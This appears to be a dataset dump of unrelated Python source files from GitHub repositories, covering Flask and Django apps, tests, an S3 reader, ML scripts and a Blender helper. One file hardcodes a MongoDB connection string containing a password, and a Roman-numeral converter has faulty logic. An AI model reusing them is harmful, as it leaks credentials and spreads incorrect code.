print(\"done.\")\n\n","repo_name":"hungarian-notation/lua-game-old","sub_path":"LuaGame/buildscripts/auxiliaries.py","file_name":"auxiliaries.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35373452256","text":"class Menu():\n def __init__(self):\n self.menu = [\n {\"dish\": \"Margarita\", \"price\": 14.99, \"category\": \"main\", \"quantity\": 0},\n {\"dish\": \"Four Cheese\", \"price\": 15.99, \"category\": \"main\", \"quantity\": 0},\n {\"dish\": \"Hawaiian\", \"price\": 16.99, \"category\": \"main\", \"quantity\": 0},\n {\"dish\": \"Meat Feast\", \"price\": 17.99, \"category\": \"main\", \"quantity\": 0},\n {\"dish\": \"Chicken Tikka\", \"price\": 18.99, \"category\": \"main\", \"quantity\": 0},\n {\"dish\": \"Vegetarian\", \"price\": 19.99, \"category\": \"main\", \"quantity\": 0},\n {\"dish\": \"Special\", \"price\": 20.99, \"category\": \"main\", \"quantity\": 0},\n\n {\"dish\": \"Chips\", \"price\": 4.99, \"category\": \"side\", \"quantity\": 0},\n {\"dish\": \"Salad\", \"price\": 8.99, \"category\": \"side\", \"quantity\": 0},\n {\"dish\": \"Sauces\", \"price\": 5.99, \"category\": \"side\", \"quantity\": 0},\n\n {\"dish\": \"Ice cream\", \"price\": 4.99, \"category\": \"dessert\", \"quantity\": 0},\n {\"dish\": \"Chocolate cake\", \"price\": 3.99, \"category\": \"dessert\", \"quantity\": 0},\n {\"dish\": \"Apple pie\", \"price\": 7.99, \"category\": \"dessert\", \"quantity\": 0},\n\n {\"dish\": \"Coca cola\", \"price\": 19.99, \"category\": \"drink\", 
\"quantity\": 0},\n {\"dish\": \"Water\", \"price\": 19.99, \"category\": \"drink\", \"quantity\": 0},\n {\"dish\": \"Orange juice\", \"price\": 19.99, \"category\": \"drink\", \"quantity\": 0}\n]\n\n # formatted view of Menu \n def menu_view(self):\n mains = [f\"{dish['dish']} | {dish['price']}\\n\" for dish in self.menu if dish[\"category\"] == \"main\"]\n sides = [f\"{dish['dish']} | {dish['price']}\\n\" for dish in self.menu if dish[\"category\"] == \"side\"]\n desserts = [f\"{dish['dish']} | {dish['price']}\\n\" for dish in self.menu if dish[\"category\"] == \"dessert\"]\n drinks = [f\"{dish['dish']} | {dish['price']}\\n\" for dish in self.menu if dish[\"category\"] == \"drink\"]\n return f\"*** MENU ***\\nMAINS:\\n{''.join(mains)}\\nSIDES:\\n{''.join(sides)}\\nDESSERTS:\\n{''.join(desserts)}\\nDRINKS:\\n{''.join(drinks)}\"\n \n # returns menu lits of dictionaries\n def menu_objects(self):\n return self.menu\n\n","repo_name":"xAmiBa/Takeaway_app","sub_path":"lib/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8643468238","text":"from db.models import TaxModel, DiscountModel\nimport unittest\nfrom app import app\n\nTaxModel.get_tax = lambda region: 3\nDiscountModel.get_discount = lambda cost: 5\n\nclass FlaskTest(unittest.TestCase):\n def test_not_allowed(self):\n response = app.test_client().get('/api/v1/calculate')\n self.assertEqual(response.status_code, 405)\n\n def test_empty_body(self):\n response = app.test_client().post('/api/v1/calculate')\n self.assertEqual(response.status_code, 400)\n\n def test_success(self):\n response = app.test_client().post('/api/v1/calculate', json={ \"amount\":1, \"cost\": 1000, \"region\": \"NV\"})\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.json, {'discount': 5.0, 'discounted_cost': 950.0, 'tax': 3.0, 'total_cost': 978.5})\n\n def test_failed(self):\n response = app.test_client().post('/api/v1/calculate', json={ \"amount\":1, \"cost\": \"dfgdfg\", \"region\": \"NV\"})\n self.assertEqual(response.status_code, 400)\n\n \nif __name__ == '__main__':\n unittest.main()","repo_name":"dtxth/gatech","sub_path":"services/restapi/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22886770931","text":"class Solution:\n def romanToDecimal(self, S): \n m=0\n d={'I':1,'V':5,'X':10,'L':50,'C':100,'D':500,'M':1000}\n for i in S:\n m+=d[i]\n if 'IV' in S or 'IX' in S:\n m=m-2\n if 'XL' in S or 'XC' in S:\n m=m-20\n if 'CD' in S or 'CM' in S:\n m=m-200\n return m\n","repo_name":"Lalith3470/GeeksforGeeks","sub_path":"Roman Number to Integer.py","file_name":"Roman Number to Integer.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"11955985520","text":"\"\"\"\n Florgon API session token implementation.\n\"\"\"\n\nfrom .base_token import BaseToken\n\n\nclass SessionToken(BaseToken):\n \"\"\"\n Session token JWT implementation.\n\n Used to issue new access tokens.\n Root token for Florgon core authorization process.\n Linked with session.\n \"\"\"\n\n _type = \"session\"\n\n # Custom payload fields.\n _session_id: int = None\n\n def get_session_id(self) -> int:\n \"\"\"Returns session ID from the session token.\"\"\"\n return self._session_id # pylint: 
\n\n def __init__(\n self,\n issuer: str,\n ttl: int | float,\n user_id: int,\n session_id: int | None = None,\n payload: dict | None = None,\n *,\n key: str | None = None\n ):\n super().__init__(issuer, ttl, subject=user_id, payload={}, key=key)\n self._session_id = session_id # pylint: disable=protected-access\n\n @classmethod\n def decode(cls, token: str, key: str | None = None):\n \"\"\"\n Decoding with custom payload fields.\n \"\"\"\n instance = super(SessionToken, cls).decode(token, key)\n\n session_id = instance._raw_payload[\"sid\"] # pylint: disable=protected-access\n instance._session_id = session_id # pylint: disable=protected-access\n return instance\n\n def encode(self, *, key: str | None = None) -> str:\n \"\"\"\n Encodes token with custom payload fields.\n \"\"\"\n self.custom_payload[\"sid\"] = self._session_id\n return super().encode(key=key)\n","repo_name":"florgon/api","sub_path":"src/api/app/services/tokens/session_token.py","file_name":"session_token.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"31"} +{"seq_id":"42281703121","text":"# TASK 3: CREATE A FUNCTION THAT CAN READ ANY FILE FROM S3 BUCKET\n\nimport os\nimport io\nfrom io import StringIO\nimport yaml\nimport boto3\nimport botocore\nimport pandas as pd\nfrom dotenv import load_dotenv, find_dotenv\n\nload_dotenv(find_dotenv()) # Loads the .env file.\n\ndef read_s3_file(bucket_name, key, num_row=None):\n \"\"\"\n Reads a file from an S3 bucket and returns its contents (a DataFrame for\n tabular formats, a dict for JSON/YAML).\n These are the libraries required to use this function:\n boto3\n pandas\n python-dotenv\n\n \"\"\"\n try:\n s3 = boto3.client('s3',\n aws_access_key_id=os.getenv('ACCESS_KEY_ID'),\n aws_secret_access_key=os.getenv(\"SECRET_ACCESS_KEY\"))\n except botocore.exceptions.ClientError:\n exit(403)\n obj = s3.get_object(Bucket=bucket_name, Key=key)\n #obj = s3.get_object(Bucket=bucket_name, Key=f\"{key}/{key}\")\n buffer = io.BytesIO()\n file_ext = key.split(\".\")[-1]\n if file_ext in [\"csv\", \"txt\"]:\n df = pd.read_csv(obj['Body'])\n if df.shape[0] == 0:\n exit(500)\n elif file_ext in [\"xls\", \"xlsx\"]:\n df = pd.read_excel(io.BytesIO(obj['Body'].read()))\n elif file_ext == \"json\":\n num_row = None\n df = pd.read_json(obj['Body']).to_dict()\n elif file_ext == \"parquet\":\n s3 = boto3.resource('s3',\n aws_access_key_id=os.getenv('ACCESS_KEY_ID'),\n aws_secret_access_key=os.getenv(\"SECRET_ACCESS_KEY\"))\n object = s3.Object(bucket_name=bucket_name, key=key)\n object.download_fileobj(buffer)\n df = pd.read_parquet(buffer)\n elif file_ext in [\"yaml\", \"yml\"]:\n df = yaml.safe_load(obj[\"Body\"])\n\n else:\n print(f\"{file_ext} can not be handled\")\n exit(500)\n\n if num_row:\n return df.head(num_row)\n return df ## End of function\n\n#\n#\n# bucket_name = \"uk-naija-datascience-21032023\"\n# key = \"Folder1/Folder2/gdp-countries.parquet\" # this means the full key (folder path) to the file\n#\n#\n# file_contents = read_s3_file(bucket_name, key, 10)\n# print (file_contents)\n#\n# # sample files in S3 are:\n# # omolewa.csv\n# # ny_apartment_cost_list.csv\n# # myfile.txt\n# # season1.json\n# # hyp.scratch.yaml\n# # gdp-countries.parquet\n# # new-sales-sheet.xlsx - https://stackoverflow.com/questions/61723572/how-to-read-excel-file-from-aws-in-python-3/61723955#61723955?newreg=c9c4eb2ab84a4b5cb021bf7603b01c54\n# # how to read a parquet file - 
https://stackoverflow.com/questions/51027645/how-to-read-a-single-parquet-file-in-s3-into-pandas-dataframe-using-boto3\n\n\n\n\n\n","repo_name":"Aikezl/food_delivery_intelligence","sub_path":"copy_s3_file/s3-read.py","file_name":"s3-read.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74950795289","text":"\"\"\"\nStocks Advisor\n\"\"\"\n\nimport configs.alphaconf\nimport libs.stockslib as sl\nimport fire\nimport json\nimport os\nfrom pprint import pprint\n\n\nclass ADVISOR(object):\n \"\"\"Stocks Advisor\"\"\"\n\n def __init__(self, datatype='m'):\n self.key = configs.alphaconf.key\n\n self.datatype = datatype\n\n if self.datatype == 'm':\n self.watchdata = configs.alphaconf.symbols_m\n else:\n self.watchdata = configs.alphaconf.symbols\n\n self.tobuy = dict()\n self.tosell = dict()\n\n self.incomelimit = 5\n self.luck = 0.2\n\n def check_watchlist(self):\n \"\"\"Checks indicators\"\"\"\n\n for item in self.watchdata:\n\n # Parse watchlist\n if isinstance(item, dict):\n price = list(item.values())[0]\n symbol = list(item.keys())[0]\n else:\n symbol = item\n price = 0\n\n # print(symbol)\n\n # Init\n res = sl.RESOURCE(symbol=symbol, price_header='Close')\n if self.datatype == 'm':\n res.prices = res.get_prices_from_moex(cacheage=3600*12, days=200, cachedir=os.path.join('cache-m'))\n res.prices = res.prices.tail(200)\n else:\n res.get_prices_from_alpha(key=self.key, cacheage=3600*6)\n res.fix_alpha_columns()\n\n # res.get_history_from_alpha(key=self.key)\n # res.fix_alpha_history_columns()\n\n lastprice = res.get_last_price()\n\n buy = 0\n\n # FB Prophet\n # if res.get_prophet_prediction() > 30:\n # buy += 1\n\n # Check for anomaly\n res.is_anomaly()\n\n # Calculate strategies\n for strategy_name in configs.alphaconf.ratios.keys():\n try:\n if self.datatype == 'm':\n weight = configs.alphaconf.ratios_m[strategy_name][symbol]\n else:\n weight = configs.alphaconf.ratios[strategy_name][symbol]\n except KeyError:\n weight = 0\n strategy_method = getattr(res, strategy_name)\n try:\n rez = strategy_method()\n except Exception:\n print(symbol, 'failed', strategy_method)\n rez = 0\n if rez > 0:\n buy += weight * rez\n else:\n buy += rez\n\n if buy > self.luck * len(configs.alphaconf.ratios.keys()):\n res.buy = buy\n self.tobuy[symbol] = [buy, lastprice, res.msg]\n\n if lastprice > price > 0:\n income = round((lastprice / price - 1) * 100, 1)\n if income > self.incomelimit:\n self.tosell[symbol] = [buy, income, res.msg]\n\n print('BUY:')\n print(json.dumps(self.tobuy, indent=4))\n print('SELL:')\n print(json.dumps(self.tosell, indent=4))\n\n\nif __name__ == \"__main__\":\n adv = ADVISOR(datatype='a')\n fire.Fire(adv.check_watchlist)\n","repo_name":"Iyamoto/stocksadvisor","sub_path":"old/advisor.py","file_name":"advisor.py","file_ext":"py","file_size_in_byte":3094,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"37071229701","text":"import tensorflow as tf\nimport numpy as np\nimport joblib\nfrom rllab.sampler.utils import rollout, deterministic_rollout\nfrom rllab.envs.gym_env import GymEnv\nfrom sandbox.rocky.tf.envs.base import TfEnv\nfrom correct_overapprox import ReluProtector, build_multi_step_network, display_ops, write_to_tensorboard, write_metadata, collect_output_ops\nfrom tensorflow.python.framework import graph_util\nfrom NNet.scripts.pb2nnet import FFTF2W, pb2W\nimport parsing\n\n\n# Goal of script: parse 'xW' convention rllab (feedforward) policies into 'Wx' networks that I can then combine with dynamics easily\n
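\n# (Background note, added: rllab's dense layers compute y = x*W + b, while the\n# verification tooling below expects y = W*x + b, hence the transposes applied to\n# the extracted weights and biases.)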
policies into 'Wx' networks that I can then combine with dynamics easily\n\n# file = \"/Users/Chelsea/Dropbox/AAHAA/src/rllab/data/local/experiment/relu_small_network_vpg_capped_action_trying_simpler_dense_layer/params.pkl\"\n# # ^ the only policy file that works. ALSO...I think I messed up my rllab, trrying to change the weights.....so I have a bit to fix before I can make new policies again\n\nfile = \"/Users/Chelsea/Dropbox/AAHAA/src/rllab/data/local/experiment/relu_small_network_ppo_capped_action/params.pkl\"\n\nsim = False\n\n# load and simulate\nsess = tf.Session()\n# load policy\nwith sess.as_default():\n data = joblib.load(file)\n policy = data[\"policy\"]\n # can sim policy to test it! :DDD\n if sim:\n env = TfEnv(GymEnv(\"MyPendulum-v0\", record_video=False))\n path = deterministic_rollout(env, policy, max_path_length=500, animated=True, speedup=2, always_return_paths=True)\n print(\"reward: \", sum(path[\"rewards\"]))\n input(\"enter to continue\")\n\n\n# extract mean network only, make sure it looks ff\noutput_op_names = [\"policy/mean_network/output\"]\noutput_graph_def = graph_util.convert_variables_to_constants(\n sess, # sess used to retrieve weights\n sess.graph.as_graph_def(), # graph def used to retrieve nodes\n output_op_names # output node names used to select useful nodes\n )\n# print op list to make sure its only stuff we can handle\nprint(\"op set: \", {(x.op,) for x in output_graph_def.node})\n# turn graph def back into graph\ntf.import_graph_def(output_graph_def)\n\n\n# write to tensorboard\nf_id = str(int(np.round(np.random.rand()*5000)))\nLOGDIR = \"/Users/Chelsea/Dropbox/AAHAA/src/OverApprox/tensorboard_logs/looking_at_old_controller_\"+f_id\nwrite_to_tensorboard(LOGDIR, sess)\n# next run at command line, e.g.: tensorboard --logdir=/Users/Chelsea/Dropbox/AAHAA/src/OverApprox/tensorboard_logs/looking_at_old_controller_4909\n\n\n# save as .pb\noutput_graph_name = \"/Users/Chelsea/Dropbox/AAHAA/src/OverApprox/nnet_files/bad_relu_rllab_controller_graph_def_\"+f_id+\".pb\"\nwith tf.gfile.GFile(output_graph_name, \"w\") as f:\n f.write(output_graph_def.SerializeToString())\n print(\"%d ops in the final graph.\" % len(output_graph_def.node)) \n\n# get out weights and biases for turning back into a tf network\nweights, biases = pb2W(output_graph_name, inputName=\"policy/mean_network/input/input\", outputName=output_op_names[0])\n# have to transpose because we're coming from rllab\nweights = [w.transpose() for w in weights]\n# NOTE: only doing this next step like this because I am using a network that has 'expand dims' in it, and thus I pick out the 1D biases from rllab\nbiases = [np.array([b]).transpose() for b in biases]\n\n# turn back into a tf network\nff_input = tf.placeholder(tf.float32, shape=(2,1), name=\"state0\")\nffnet = parsing.create_tf_network(weights,biases,inputs=ff_input, activation=tf.nn.relu, act_type='Relu', output_activated=False)\n\n# evaluate to make sure that the networks are the same\nrllab_input = tf.placeholder(tf.float32, shape=(1,2), name=\"rllab_inputs\")\ntest_input_xW = np.random.rand(1,2)*2-1\ntest_input_Wx = test_input_xW.transpose()\nrllab_output_tensor = tf.get_default_graph().get_operation_by_name(output_op_names[0]).outputs[0]\nrllab_output = sess.run([rllab_output_tensor], feed_dict={\"policy/mean_network/input/input:0\": test_input_xW})\nffnet_output = sess.run([ffnet], feed_dict={ff_input: test_input_Wx})\n\nassert all(rllab_output[0] - ffnet_output[0]<1e-3)\nprint(\"tests pass!\") \n\n\n# write to file as .nnet or .pb 
!!\n\n\n\n","repo_name":"chelseas/OVERT","sub_path":"depreciated/Pre_Amir_files/testing_policy_parsing.py","file_name":"testing_policy_parsing.py","file_ext":"py","file_size_in_byte":4035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73796512728","text":"from django.forms import ModelForm\nfrom webapp.models import Group, Student\n\n\nclass GroupForm(ModelForm):\n\n class Meta:\n model = Group\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(GroupForm, self).__init__(*args, **kwargs)\n self.fields['name'].widget.attrs = {\n 'class': 'form-control',\n 'placeholder': 'Group name'\n }\n self.fields['head'].widget.attrs = {\n 'class': 'form-control',\n }\n\n # article = Article.objects.get(pk=1)\n # form = ArticleForm(instance=article)\n\n self.fields['head'].queryset = Student.objects.filter(group=self.instance)\n # self.fields['head'].queryset = group.student_set.all()\n\n\nclass StudentForm(ModelForm):\n\n class Meta:\n model = Student\n fields = [\n 'first_name',\n 'last_name',\n 'group',\n 'brd_date',\n 'ticket'\n ]\n\n def __init__(self, *args, **kwargs):\n super(StudentForm, self).__init__(*args, **kwargs)\n self.fields['first_name'].widget.attrs = {\n 'class': 'form-control',\n 'placeholder': 'First name'\n }\n self.fields['last_name'].widget.attrs = {\n 'class': 'form-control',\n 'placeholder': 'Last name'\n }\n self.fields['group'].required = False\n self.fields['group'].empty_label = None\n self.fields['group'].widget.attrs = {\n 'class': 'form-control'\n }\n self.fields['brd_date'].widget.attrs = {\n 'class': 'form-control',\n 'placeholder': 'Date of birth',\n }\n self.fields['ticket'].widget.attrs = {\n 'class': 'form-control',\n 'placeholder': 'Ticket number'\n }\n","repo_name":"dimdiden/Student","sub_path":"webapp/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11955998882","text":"\"\"\" Cart module test cases \"\"\"\nfrom typing import List\n\nimport pytest\n\nfrom lecture.shop.cart import Cart\nfrom lecture.shop.products import Product\n\nproduct1 = Product(\n product_id=1,\n title='Hello',\n price=10.0\n)\n\nproduct2 = Product(\n product_id=2,\n title='Hello2',\n price=100.0\n)\n\n\n\n\n@pytest.fixture()\ndef db():\n \"\"\" PRE TEST \"\"\"\n # INITIALIZE DB. FRESH. 
SEED WITH OBJECT\n    yield\n    \"\"\" POST TEST \"\"\"\n    # CLEAN DB\n\n\n@pytest.fixture()\ndef cart() -> Cart:\n    # The tests below all request a ``cart`` fixture that this file never\n    # defined (it may have lived in a conftest.py); without it pytest fails\n    # with \"fixture 'cart' not found\".\n    return Cart()\n\n\ndef test_add_to_cart():\n    cart = Cart()\n    product = Product(\n        product_id=1,\n        title='Hello',\n        price=10.0\n    )\n\n    cart.add_to_cart(product)\n\n    assert [product] == cart.get_products()\n\n\n@pytest.mark.parametrize(\n    'product_to_add, product_to_remove, result',\n    [\n        (product2, product2, []),\n        (product1, product2, [product1]),\n    ]\n)\ndef test_remove_product(\n    cart: Cart,\n    product_to_add: Product,\n    product_to_remove: Product,\n    result: List[Product]\n):\n    cart.add_to_cart(product_to_add)\n    cart.remove_from_cart(product_to_remove)\n\n    assert result == cart.get_products()\n\n@pytest.mark.parametrize(\n    'number',\n    [\n        '123456789012',\n        '123456789011',\n    ]\n)\ndef test_number_valid(cart: Cart, number: str):\n    assert cart.is_phone_number(number)\n\n\n@pytest.mark.parametrize(\n    'number',\n    [\n        '12345678901',\n        '1234567890123',\n        '1234567890A2',\n        '1234567890#2',\n    ]\n)\ndef test_number_invalid(db, cart: Cart, number: str):\n    assert not cart.is_phone_number(number)\n","repo_name":"kyryloprogs/Hometask_Testing","sub_path":"lecture/tests/test_cart.py","file_name":"test_cart.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16523331056","text":"# -*- coding: utf-8 -*-\n# @Time    : 04/11/2022 10:31\n# @File    : app.py\nfrom typing import Optional\n\nfrom fastapi import FastAPI, Query, Path, HTTPException\nfrom flair.data import Sentence\n\nfrom src.class_type import NerInput, NerOutput\nfrom src.model import load_models\nfrom src.utils import parse_result_flair_ner, anonymize_text_flair_ner\n\napp_api = FastAPI()\nmodels = load_models()\n\n\n@app_api.get(\"/\")\nasync def root():\n    return {\"message\": \"Hello World\"}\n\n\n@app_api.post(\"/ner\", response_model=NerOutput)\nasync def apply_ner(user_input: NerInput):\n    text = user_input.text\n    lang = user_input.language\n\n    if lang in [\"fr\", \"en\"]:\n        # make sentence\n        sentence = Sentence(text)\n        # predict NER tags\n        models[lang].predict(sentence)\n\n        # parse results\n        results = parse_result_flair_ner(sentence)\n        anonymize_text = anonymize_text_flair_ner(text, sentence)\n\n        return {\n            \"entities\": results,\n            \"anonymize_text\": anonymize_text\n        }\n\n    else:\n        raise HTTPException(status_code=404,\n                            detail=f\"Use lang 'en' or 'fr' not {lang}\")\n","repo_name":"enzorc/demo-ner-api","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2902881983","text":"import bpy\nfrom .nodes_from_context import nodes_from_context\n\ndef slot_node_from_context(name, context):\n    # type: (bpy.Optional[str], bpy.ContextType) -> bpy.Optional[bpy.Tuple[bpy.SlotNodeType, bpy.types.Nodes]]\n    if name is None:\n        return\n    nodes = nodes_from_context(context)\n    if nodes is None:\n        return\n    if name not in nodes:\n        return\n    node = nodes[name]\n    if node.bl_idname != \"SlotNode\":\n        return\n    return (node, nodes)
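\n\n# Usage sketch (illustrative only; \"MySlotNode\" is a placeholder name, and\n# the call must run inside a Blender context that provides a node tree):\n#     hit = slot_node_from_context(\"MySlotNode\", context)\n#     if hit is not None:\n#         node, nodes = hit\n","repo_name":"mmulet/font-game-engine","sub_path":"blender/fontemon_blender_addon/SceneTreeEditor/slot_node_from_context.py","file_name":"slot_node_from_context.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":138,"dataset":"github-code","pt":"31"} +{"seq_id":"9542603516","text":"dictCadastro = dict()\ngalera = []\nmedia = soma = 0\nwhile True:\n    dictCadastro.clear()\n    dictCadastro[\"nome\"] = 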
input(\"Nome: \").strip()\n dictCadastro[\"sexo\"] = input(\"Sexo: [M/F] \" ).strip()[0]\n while dictCadastro[\"sexo\"] not in \"MmFf\":\n print(\"ERRO! Por favor, digite apenas M ou F \")\n dictCadastro[\"sexo\"] = input(\"Sexo [M/F] \")\n dictCadastro[\"idade\"] = int(input(\"Idade: \"))\n soma += dictCadastro[\"idade\"]\n galera.append(dictCadastro.copy())\n resp = input(\"Quer continuar? [S/N] \").strip()\n while resp not in \"sSnN\":\n print(\"ERRO! Responda apenas S ou N\")\n resp = input(\"Quer continuar? [S/N] \")\n if resp in \"nN\":\n break \nprint(f\"Ha ao todo {len(galera)} pessoas cadastradas\")\nmedia = soma / len(galera)\nprint(f\"A media de idade e de {media:5.2f} anos\")\nprint(\"As mulheres cadastradas foram \", end = \"\")\nfor p in galera:\n if p[\"sexo\"] in \"fF\":\n print(f'{p[\"nome\"]}', end= \"\")\nfor p in galera:\n if p[\"idade\"] >= media:\n print(\" \")\n for k, v in p.items():\n print(f'{k} = {v} ', end = '')\n print()\nprint(\"ENCERRADO\")\n","repo_name":"AbelRapha/Python-Exercicios-CeV","sub_path":"Mundo 3/ex094 Unindo Dicionarios e Listas.py","file_name":"ex094 Unindo Dicionarios e Listas.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31005188067","text":"from django.contrib import admin\nfrom django.urls import path\n\nfrom myapp.views import *\n\napp_name = \"myapp\"\n\nurlpatterns = [\n path('register/',registerView,name=\"reg\"),\n path('success/',success_view,name=\"suc\"),\n path('goa///', go_a),\n path('handle///',handler_a,name='handle'),\n]\n","repo_name":"SpCrazy/crazy","sub_path":"code/djangoDay3/myapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27678537695","text":"from app import create_app\nfrom flask_pymongo import PyMongo\nfrom flask import Flask\napp = create_app()\nmongodb_client = PyMongo(app, uri=\"mongodb+srv://new:abcd1234@cluster0.sm1gh.mongodb.net/newd?retryWrites=true&w=majority\")\ndb = mongodb_client.db\n\n\n@app.route(\"/add_one\")\ndef add_one():\n user = mongodb_client.db.job\n user.insert_one({'title': \"todo title\", 'body': \"todo body\"})\n return \"ok\"\n\nif __name__ == '__main__': \n app.run(debug=True)\n ","repo_name":"unboxdisease/webhook-repo","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4051323594","text":"import argparse\nimport numpy as np\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.metrics import accuracy_score\nfrom torch import load\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--k', type=int, default=3)\n args = parser.parse_args()\n print('Loading training data...')\n metadata = load('train-vq-vae-embeddings.pt')\n data_train = metadata['vq_embeddings'].reshape(-1, 64*8*8)\n print('X:', data_train.shape)\n targets_train = metadata['targets']\n print('y:', len(targets_train))\n\n print('Fitting classifier to training data...')\n clf = KNeighborsClassifier(n_neighbors=args.k)\n clf.fit(data_train, targets_train)\n\n train_score = clf.score(data_train, targets_train)\n print('Train Accuracy:', train_score)\n print('\\nLoading validation data...')\n metadata = load('val-vq-vae-embeddings.pt')\n data_val = metadata['vq_embeddings'].reshape(-1, 64*8*8)\n print('X_val:', 
data_val.shape)\n    targets_val = metadata['targets']\n    val_score = clf.score(data_val, targets_val)\n    # the validation score was computed but never reported; print it like the train score\n    print('Validation Accuracy:', val_score)\n\n\nif __name__ == '__main__':\n    main()\n\n","repo_name":"anican/generalization","sub_path":"experiments/vae/knn_graph.py","file_name":"knn_graph.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70090710168","text":"\"\"\"Texture conversion utility for Khukuri project\n\nThis little utility creates combined textures from exported baked materials by\nthe UE4 material baking process. Instead of using a separate texture for each\nmap like roughness, metalness, AO or specular, bake these into color channels\nto save textures. The resulting textures can be reimported into the UE4 Editor\nand used with a very simple material.\n\nThis is a special case for the Khukuri project made for the Unreal Engine\nMarketplace, but feel free to modify for any purpose.\n\n+-------------------------+----------+-----------+----------+----+----------+\n| Knife variant           | diffuse  | roughness | metallic | AO | specular |\n|                         | + normal |           |          |    |          |\n+-------------------------+----------+-----------+----------+----+----------+\n| Solo knife              |    X     |     G     |    B     | -  |   R(*)   |\n| Solo silver sheath      |    X     |     G     |    B     | -  |    -     |\n| Solo leather sheath     |    X     |     G     |    B     | R  |    -     |\n| Knife in silver sheath  |    X     |     G     |    B     | -  |    -     |\n| Knife in leather sheath |    X     |     G     |    B     | R  |    -     |\n+-------------------------+----------+-----------+----------+----+----------+\n\nExport the textures from UE4 after they are created by material baking.\nDiffuse and Normal are just converted to PNG without any further processing.\nAll others are joined by this script. The table above shows which maps are\nrequired for which mesh and which color channels are used.\n\nFor the knives with sheath combinations, 2 separate materials are baked. The\noriginal approach to join these as well into one single texture using a mask\nto have only one draw call has been dropped (problems with normal maps :)\n\n(*) specular is used for the solo knives' blood only - only export if needed\n\nThe naming of UE4 exported files is as follows (example for diffuse texture)\n\nT_M_SM_Knife1_MI_Knife1_E22686584D98CA622DF16A8552089CC3_BaseColor.TGA\n---|---01----|---02----|---------------03---------------|---04----\n \nThe interesting 4 parts have been marked:\n01: Mesh name used for baking in UE4\n02: Material instance name. Needs MI_ prefix and must contain keywords \n    that can be detected by the script: Leather, Silver, Knife, Grip\n03: GUID generated by UE4 Mesh Editor during bake\n04: Type of exported texture as string, as selected during bake: \n    BaseColor, Normal, Metallic, Roughness, AmbientOcclusion or Specular\n    \nIMPORTANT: Export has to be done in 2K for all textures. 
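\n\nFor orientation, the core of the channel packing boils down to a few PIL\ncalls (a minimal sketch with placeholder file names, not the full logic\nimplemented below):\n\n    from PIL import Image\n    rough = Image.open('Work/rough.png').split()[1]   # roughness -> G\n    metal = Image.open('Work/metal.png').split()[2]   # metallic  -> B\n    ao    = Image.open('Work/ao.png').split()[0]      # AO        -> R\n    Image.merge('RGB', (ao, rough, metal)).save('Work/packed.png')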
\n\"\"\"\n\nimport os\nimport sys\nimport re\nfrom PIL import Image\n\n__author__ = \"Herbert Mehlhose\"\n__copyright__ = \"Copyright 2020, Herbert Mehlhose\"\n#__credits__ = []\n__license__ = \"CC0\"\n__version__ = \"1.0\"\n__maintainer__ = \"Herbert Mehlhose\"\n__email__ = \"\"\n__status__ = \"Final\"\n\n# My dictionary class\nclass hfcmDict(dict):\n    def __missing__(self, key):\n        value = self[key] = type(self)()\n        return value \n    \n# Subdirectory to drop in exported textures from UE4 and destination of PNGs\nimagesDir = 'Work'\n\n# Texture size\ntexsize = 2048\n \n# Keywords to be included in material instance names to recognize function\nmatkeywords = ('Leather', 'Silver', 'Knife', 'Grip')\n\nsuffixes = {'BaseColor': 'D',\n            'Normal': 'N',\n            'Metallic': 'M',\n            'Roughness': 'R',\n            'AmbientOcclusion': 'O', \n            'Specular': 'S'}\n\nimages = hfcmDict()\nmeshes = hfcmDict()\n\ndirectory = os.getcwd() + '/' + imagesDir\n\n_R_ = re.compile('^T_M_(?P<MESH>.+)'\n                 '(?P<MATINST>_MI_.+)_'\n                 '(?P<GUID>[0-9A-F]{32})_'\n                 '(?P<TEXTYPE>.+)')\n\nfor file in os.listdir(directory):\n    filename = os.fsdecode(file)\n    if filename.endswith(\".TGA\"):\n        (filenameonly, filetype) = os.path.splitext(filename)\n        Match = _R_.match(filenameonly)\n        mesh = Match.group('MESH')\n        matinst = Match.group('MATINST')\n        guid = Match.group('GUID')\n        key = matinst + '_' + guid\n        if 